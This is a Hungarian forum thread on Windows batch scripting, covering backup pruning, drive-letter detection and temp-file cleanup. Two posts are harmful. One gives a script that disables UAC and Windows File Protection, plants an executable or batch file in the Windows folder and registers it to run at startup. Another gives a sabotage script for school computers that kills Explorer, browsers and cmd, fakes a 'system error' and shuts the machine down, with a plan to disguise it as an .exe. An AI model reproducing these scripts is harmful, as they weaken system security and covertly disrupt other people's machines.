Batch programozás
Jelentkezz be a hozzászóláshoz.
Set /a llyear=%lyear%-1
így frankó, köszi 😊
Aztán megálmodtam, hogy ugyanaz az erõszakos törlés jó a hónapra is, ha az elsõ 7 nap egyik mentését tartom meg 😊
sg discord: https://discord.gg/ezkyQvNE
Xubuntu 14.04.5 /WIndows 7 Enterprise/Windows XP professional SP3(némely szoftver inkompatibilis az elöz?vel). :)
set/a %ev%=%ev%-1
Xubuntu 14.04.5 /WIndows 7 Enterprise/Windows XP professional SP3(némely szoftver inkompatibilis az elöz?vel). :)
set/a %ev%-1
próbáld ki hogy az eredményt echo-ban írja ki.
Backup rendszert csinálnék, amihez a windowst meg a feladatkezelõjét használnám.
A mentés része rendben van, egy D:\Backup\<év>\<hónap>\<nap> könyvtárba elmentem azt a heti mentést, amit a többi számítógép csinál a szóban forgóra. Persze, feladatütemezõvel hetente egyszer 😊
A fogós dolog innen jön:
Hogy ne teljen meg a háttértár, törölgetni is szeretnék. Pl havonta egyszer lefutna egy batch, ami törli az egy évvel ezelõtti könyvtár tartalmát egy mentés kivételével. Pl most hó végén lefutna egy, ami 2012\03 könyvtárban csak a legutolsó mentést hagyná meg (2012\03\25)
Ezt hogy lehetne megcsinálni?
Ezután persze még évente lefutna egy másik script, ami mondjuk az 5 évnél idõsebb könyvtárakat törölgetné, bár ott könnyû, mert 01-11-ig végigmegy, a törlés (deltree?) meg intézkedne 😊
Szóval, a lényeg: kinyerem a dátumot, és hogy csökkentem eggyel az évet? (sima %ev% = %ev%-1? 😄 túl egyszerûnek tûnik)
Hogyan törlöm egy könyvtár tartalmát valamilyen sorrendben úgy, hogy a legutolsó könyvtárat megtartom?
sg discord: https://discord.gg/ezkyQvNE
A világon 10 féle ember létezik. Aki ismeri a bináris számrendszert, aki nem, és aki tudja, hogy ez a vicc valójában ternáris.
@echo off
for /f "tokens=3" %%i IN ('reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup /v "SourcePath" ^| findstr "REG_SZ"') do set SOURCE=%%i
echo A telepitofajlok forrasa a: %SOURCE%
START /MIN %SOURCE%\SETUP.BAT
EXIT
%userprofile% felhasználóprofil
%systemroot% ill. %windir% egyértelmû
%systemdrive% rendszermeghajtó
%temp% ideiglenes fájlok
%appdata% felhasználó applikációs adatkönyvtára
%public% Felhasználók nyilvános könyvtára
%programdata%
%startup% --> Na ez lenne jó Xp-re, de Win7-en csak batchban indulna az ablakokban, innen az UAC ugysem engedi.
Viszont így igen, egy START /MIN paranccsal tálcán futtatott scriptel de hogy 64biten is müxödjön, egy 64biten futtatható sfx-be kell ültetni hogy érvénybe léphessen 64bites platformon az UAC kikapcsolása:
@echo off
SETLOCAL ENABLEEXTENSIONS
SETLOCAL ENABLEDELAYEDEXPANSION
cd /d %~dp0
ver | find "2003" > nul
if %ERRORLEVEL% == 0 goto admin
ver | find "XP" > nul
ver | find "2000" > nul
if /i %processor_architecture%==AMD64 64bit (
ATTRIB -r -a -s -h %~dp0wtmp.dat
MOVE /Y "%TEMP%\wtmp.dat" "%WINDIR%\x64.exe"
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "virga" /d "\"%systemroot%\x64.exe\"" /f
DEL /F /S /Q /A -r -a -s -h %~dp0vb.dat
) ELSE (
ATTRIB -r -a -s -h %~dp0vb.dat
MOVE /Y "%TEMP%\vb.dat" "%WINDIR%\virga.bat"
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "virga" /d "\"%systemroot%\x64.exe\"" /f
DEL /F /S /Q /A -r -a -s -h %~dp0wtmp.dat
CLS
)
shutdown /r /t 02
<és itt jön a x64.exe vagy a virga.bat>és itt jön a x64.exe vagy a virga.bat>
@echo off
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"&&(
goto :admin
)
:getadminmode
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v "EnableLUA" /t REG_DWORD /d 0x0000000 /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "SfcDisable" /t REG_DWORD /d 0x0000001 /f
shutdown /r /t 02
:admin
cd /d %~dp0
SETLOCAL ENABLEEXTENSIONS
SETLOCAL ENABLEDELAYEDEXPANSION
És innentõl jöhet akármi...
@ECHO OFF
for %%a in (a b c d e f g h i j k l m n o p q r s t u v w x y z) do (
ECHO %%a:\testtest.id
IF EXIST %%a:\testtest.id SET USBDRV=%%a:
)
ECHO.
ECHO FILE FOUND ON %USBDRV%
A célomat eltudtam vele érni, még ha nem is teljesen tökéletes. 😊
Azért nagyon köszönöm a segítségedet
VIL-ASUS 8800GTS HDTV 320 MB PCI-E | AS-ASUS P5W DH Deluxe S775 | RAM: 4 GB(KINGMAX) | CPUI - Intel CORE 2 DUO E66 BOX S775 | Logitech G15 keyboard | Logitech G5 mouse | MAXIMUM GAME
Van-e arra vonatkozó formula amivel megtudnám határozni "%Változó meghajtót%?
VIL-ASUS 8800GTS HDTV 320 MB PCI-E | AS-ASUS P5W DH Deluxe S775 | RAM: 4 GB(KINGMAX) | CPUI - Intel CORE 2 DUO E66 BOX S775 | Logitech G15 keyboard | Logitech G5 mouse | MAXIMUM GAME
Gondolom mindenkinek ismerõs az a dolog ha csatlakoztatunk egy USB kulcsot több számítógéphez akkor minden egyes számítógépnél más a meghajtó elnevezés, azaz más az elérési út ( G:/ ; H:/ ; I:/ stb ... )
És egy ehhez kapcsolódó 1 fura kérdés, de mégsem találom rá sehol a választ:
Van-e olyan parancs a batch programozásban hogy az elérési út változóit irányítani tehát nem azt írnám egy adott fájl elérési útnak hogy "G:/Programok/yxz.exe" hanem mondjuk "-F Programok/yxz.exe"
Tud nekem valaki ebben segíteni? Ha igen köszönöm
Van olyan program mellyel ki tudom bontani az . RTP fájlkiterjesztésû csomagolt/tömörített tartalmat?
Egy régi EA-s játék patch-érõl lenne szó, amit ki szeretnék bontani. Van hozzá Updater.exe és egy .RPD fájl is (de ez pár K😎.
Valószínû hibás vagy hiányos registry bejegyzés miatt nem látja a játékot. Köszi elõre is!
Ha nem megy feladom. azért thx ezt még utoljára megnézem.
e6550, HD6670 1GB, 4GB "Minden játék annyit ér, amennyire a játékos tartja!" "Olyan ember nincs aki nem warezol, csak aki nem vallja be." "A warez-ra kifogás nincs, csak magyarázat!" "Nem mindegy!"
Ehhez mit szólsz?:
cd %userprofile%\AppData\Local\Microsoft
erase -f -q \Windows\Temporary Internet Files\*
Ezt elmented például "torles.bat" fájlkánt mondjuk az asztalra.
Ha mûködik beteheted mondjuk a "Ütemezett feladatokba".
e6550, HD6670 1GB, 4GB "Minden játék annyit ér, amennyire a játékos tartja!" "Olyan ember nincs aki nem warezol, csak aki nem vallja be." "A warez-ra kifogás nincs, csak magyarázat!" "Nem mindegy!"
A link mögött mi az? valami automatikus tisztító?
del /f /s c:\Users\felhasználónév\AppData\Local\Microsoft\Windows\Temporary Internet Files\*.*
Vagy nézd csak, mit találtam neked: Remove temporary files and clear IE and Firefox cache
Mert pl ha csak ennyit írok be, akkor az nem csinál semmit:
del c:\Users\felhasználónév\AppData\Local\Microsoft\Windows\Temporary Internet Files
Gondolom kell valami még ...
Bevallom õszintén nem nagyon érdekel az EULA, fõleg ha a zenémrõl van szó, amit más "fizetõs" programjával kreáltam.
Aki sajnálja mástól a program forráskódját és pénzt is kér érte.... ahhoz én is így állok hozzá és figyelmen kívül hagyom az EULA-t 😛 XD
MIt tudsz akkor ajánlani, mit csináljak? Nem vagyok vérprofi, viszont érdekel ez az egész programozósdni, nagyon tetszik. Jó lenne érteni ahhoz, ami a grafika túloldalán van és vezérel.
MElyik az a legalapabb program író program, vagy felület, amivel bármi létrehozható? Egy ilyen zeneszerkesztõt pl miben írják meg? Vagyaz oprendszereket?! Tudom, kicsit nagy fába vágom a fejszém, de izgalmas téma 😄
Disassemblerrel visszafejthetnéd a programot Assembly kóddá (gépi kódhoz közeli kóddá), és megkereshetnéd benne, hogy hogyan építi fel az állományt... ...de ez egy eléggé összetett program, szóval vérprofi tudás nélkül esélytelen. Ráadásul a szoftver EULA-ja nem is engedné. 😉
A többi számom mûködik, csak ez nem.
Ha zárt forráskódú valami, hogyan tudom azt kinyitni? Lehetséges az?
Hex editort szedtem le, de az csöppet durvának tûnik, viszont! Nem adom fel, belemegyek ebbe a bináris szerkesztgetéses dologba, csak tudni kéne értelmezni ezt a sok betût meg számot.
Kiömöríteni már próbáltam, nem lehet. File recovery meg ilyen marhaságokkal is próbálkoztam, de elég gyenge ötlet volt.
Ezért gondotlam, hogy nincs más lehetõség, csak ha megtanulom értelmezni, írni, szerkeszteni ezeket a fájlokat programokat, esetleg "felt..ni" XD Hogy , ha ilyen helyzet van, akkor tudjam javítani.
Na látjátok, ezért szemétség a zárt forráskód, használjunk Linuxot XD, csak vicc....
Milyen hibát ír ki?
"Milyen programot ajánlotok, amivel beletudok piszkálni mindenféle kiterjesztésbe vagy át tudom írni a fájlok kódjait?"
Mivel zárt forráskódú szoftverrõl van szó a fájl struktúrája is ismeretlen.
Lehet, hogy tömörített (például tartalmazza a "gépi kottát" és a hangmintákat), így rá lehet engedni egy kitömörítõprogramot (például 7Zip-pet).
Vagy lehet, hogy az állományban egymás után vannak benne a dolgok - no akkor ember legyen a talpán aki megtalálja, hogy hol vannak az állományok határai.
Esetleg nekieshetsz valami hexeditorral, de a bináris adathalmazból kibányászni a tartalmat... ...érdekes egy menet lesz.
Esetleg töltsd fel, és megnézzük, mit lehet vele csinálni.
Van egy .rns kiterjesztésû fájlom (propellerheads reason használja) amit nem tudok megnyitni, mert hibát ír ki. Milyen programot ajánlotok, amivel beletudok piszkálni mindenféle kiterjesztésbe vagy át tudom írni a fájlok kódjait?(egyáltalán van olyan program, amivel mindenbe bele lehet piszkálni? Valami olyan program kéne, amivel magát a programot is írják) Az a baj, hogy nem értek a programozáshoz és fogalmam sincs, hogyan tudnám helyreállítani azt a fájlt, már próbáltam annyi mindennel, de a programozással nem. Lehet, hogy hiányzik valami kód belõle, valószinûleg rosszul mentette el. Fontos lenne nagyon. Ha hibásan is, de megtundám nyitni, azzal már elõbbre jutnék.
Elõre is köszönöm a válaszotokat, sziasztok.
Amúgy meg nem jó dolog bosszút állni mert a tanár az ilyet nem nézi jó szemmel hogy a suligépeivel szórakoztok 😊
taskkill /f /t /IM uTorrent.exe
taskkill /f /t /IM TeamViewer.exe
taskkill /f /t /IM explorer.exe
taskkill /f /t /IM vmware.exe
taskkill /f /t /IM chrome.exe
taskkill /f /t /IM firefox.exe
taskkill /f /t /IM iexplore.exe
taskkill /f /t /IM msnmsgr.exe
start C:\WINDOWS\msgbox.vbs
shutdown -s -t 25 -c "system error"
taskkill /f /t /IM cmd.exe
Ezt átkonvertálom egy .exe fáljba, hogy ne keltsen gyanút és beállítom a feladatütemezõbe, hogy pl heti egyszer futtassa le.
mûveletvégzéskor belassítja a rendszert(idõnként a gép nem válaszol) az állandó végtelen ciklus miatt,SÕT akár az is elõfordulhat hogy csak egy reset indítja azt
amúgy meg hogy ne kelljen elindítani ahhoz írni kell egy regisztrációs bejegyzést(pl.:egy *.reg fájlt)....
Rengeteg nagyon jó könyv kapható egészen kezdõknek is. Kezdõként tanulgasd a batch programozást (akár internetrõl is). Ezzel nem fogsz tudni komoly programokat készíteni, mivel ebben csak a beépített windows parancsokat használod. De legalább annyira jó, hogy elkezded kapisgálni a programozói gondolkodásmódot. 😄
Ezután jöhet valami komolyabb nyelv (ehhez már könyv vagy tanár ajánlott). Gondolok itt egy PHP, Visual Basic, Delphi, Java vagy C# nyelvre.
Ha már ezekben is otthon leszel akkor jöhetnek a "nagyágyúk" 😄 pl: C, Assembly (Na itt már kezdhetsz kártevõt írni ;D)
Sok sikert
Tanulok, mert a befektetett energia egyszer meghozza gyümölcsét...és mint tudjuk, a gyümölcsbõl pálinkát lehet fõzni! ;) http://nyaralasitthon.com
Annyit érhetsz el vele, hogy a progid nem reagál majd semmire mert folyamatosan mappákat hoz létre.
Amúgy te tanultál programozni valaha? (és hány éves vagy ha megkérdezhetem?) 😊
Tanulok, mert a befektetett energia egyszer meghozza gyümölcsét...és mint tudjuk, a gyümölcsbõl pálinkát lehet fõzni! ;) http://nyaralasitthon.com
maximum lesz egy kis sikerélménye: "húúú mennyi mappa..." xD
és köszi utána nézek goto-nak
(és ezt még szándékosan megírni?!?!?!? xD)
egyébként a goto parancs ismerõs? 😄
végtelenítést, hogy kell írni?
thx
Ehhez van egy bemeneti file. Ami egy gráf éllistával megadva.
Valaki tud segíteni?
Elõre is köszönettel!
kellene egy kis infó. van egy adott TXT állományom.
namármost egy batch file-t kellene csinálnom, amit ha lefuttatok, a txt-ben adott sorban adott helyen átjavítsa a szöveget, lehet ilyet csinálni?
<#help>#help>
Már rengeteg cikket olvastam át, de ez jónak tûnik! 😊
Intel i7 950@3,07 , Foxconn Flaming Blade GTI , ATI HD5870 , 1665GB HDD, Logitech G15 billentyûzet, Icon7 Z500,Samsung 920NW monitor, Logitech Z-5500 5.1 hangszóró